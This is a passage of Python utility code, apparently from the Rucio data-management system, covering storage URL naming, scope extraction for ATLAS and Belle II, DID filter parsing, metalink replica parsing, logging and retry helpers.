return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
register_policy_package_algorithms('surl', _SURL_ALGORITHMS)
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if '?GoogleAccessId' in surl:
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
_loaded_policy_package_scope_algorithms = False
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
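# Illustrative examples (DIDs are hypothetical):
#   extract_scope_atlas('mc16_13TeV:AOD.pool.root', scopes=None)
#   -> ('mc16_13TeV', 'AOD.pool.root')
#   extract_scope_atlas('user.jdoe.test.0001.file', scopes=None)
#   -> ('user.jdoe', 'user.jdoe.test.0001.file')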
def extract_scope_dirac(did, scopes):
# Default dirac scope extract algorithm. Scope is the second element in the LFN or the first one (VO name)
# if only one element is the result of a split.
elem = did.rstrip('/').split('/')
if len(elem) > 2:
scope = elem[2]
else:
scope = elem[1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=None):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
register_extract_scope_algorithm(extract_scope_dirac, 'dirac')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
global _loaded_policy_package_scope_algorithms
if not _loaded_policy_package_scope_algorithms:
register_policy_package_algorithms('scope', _EXTRACT_SCOPE_ALGORITHMS)
_loaded_policy_package_scope_algorithms = True
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
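# Illustrative examples (decimal, not binary, prefixes are used above):
#   sizefmt(1234567)              -> '1.235 MB'
#   sizefmt(1234567, human=False) -> '1234567'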
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally client IP will be set on the server side (request.remote_addr)
Here the IP is set to the one seen by the host itself; no packets are actually
sent to the Google DNS servers (connecting a UDP socket does not transmit data).
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
If the RUCIO_LATITUDE and RUCIO_LONGITUDE environment variables are set, they are used as the location.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
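# Illustrative example (not part of the original module; the host name is hypothetical):
# add_url_query merges new parameters into an existing query string without dropping
# the ones already present, e.g.
#     add_url_query('https://rucio.example.com/dids?limit=10', {'offset': '20'})
#     # -> 'https://rucio.example.com/dids?limit=10&offset=20'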
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
    :param input_string: String containing a value and a unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
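# Illustrative example (not part of the original module): units are decimal (powers of
# 1000) and unrecognised strings yield False rather than raising.
#     get_bytes_value_from_string('10MB')   # -> 10000000
#     get_bytes_value_from_string('10MiB')  # -> False (unit not recognised)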
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
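# Illustrative example (not part of the original module): the filter string is split on
# commas, length comparisons are mapped to 'length.gt'/'length.lt'/... keys and the
# 'type' option is returned separately.
#     parse_did_filter_from_string('length<3,type=dataset')
#     # -> ({'length.lt': 3}, 'dataset')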
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
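# Illustrative example (not part of the original module): ';' separates OR groups, ','
# separates AND terms, and each OR group becomes its own filter dictionary (values are
# left as strings; sanity checking is deferred to the filter engine).
#     parse_did_filter_from_string_fe('length>=10,name=user.jdoe:*;type=DATASET')
#     # -> ([{'length.gte': '10', 'name': 'user.jdoe:*'},
#     #      {'type': 'DATASET', 'name': '*'}], 'collection')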
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
    :param interval: Interval in seconds when the action function should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
            time.sleep(max(0, interval - (time.time() - starttime)))  # avoid a negative sleep if the action overruns the interval
t = threading.Thread(target=start)
return t
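# Illustrative usage (not part of the original module; my_heartbeat is a hypothetical
# callable): run a function every 30 seconds until the stop event is set.
#     stop_event = threading.Event()
#     t = get_thread_with_periodic_running_function(30, my_heartbeat, stop_event)
#     t.start()
#     ...
#     stop_event.set()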
def run_cmd_process(cmd, timeout=3600):
"""
    Run a shell command with a timeout.
    :param cmd: shell command as a string
    :param timeout: timeout in seconds
    :return: tuple of (returncode, stdout); any stderr output is appended to stdout
"""
    time_start = time.time()
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
    running_time = 0
    while process.poll() is None and running_time < timeout:
        # datetime.now().second wraps every minute; use an elapsed wall-clock delta instead
        running_time = int(time.time() - time_start)
        time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
try:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
except RuntimeError:
# If no configuration file is found the default value should be True
client_mode = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
        :param args: parameters of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
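# Illustrative usage (not part of the original module; the URL is hypothetical): wrap a
# flaky call and allow up to three attempts before the final exception propagates.
#     result = retry(requests.get, 'https://rucio.example.com/ping')(mtries=3)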
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
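# Illustrative usage (not part of the original module): keep an old flag working while
# warning users to migrate to the new spelling.
#     parser = argparse.ArgumentParser()
#     parser.add_argument('--old-rse', '--rse', new_option_string='--rse', dest='rse',
#                         action=StoreAndDeprecateWarningAction)
#     parser.parse_args(['--old-rse', 'MOCK'])   # prints a deprecation warning, stores 'MOCK'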
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
    StoreTrueAndDeprecateWarningAction is a descendant of :class:`argparse._StoreConstAction`
    and represents a store-true action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
        :param default: the default value of the flag
        :param required: whether the argument is required
        :param help: the help string
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
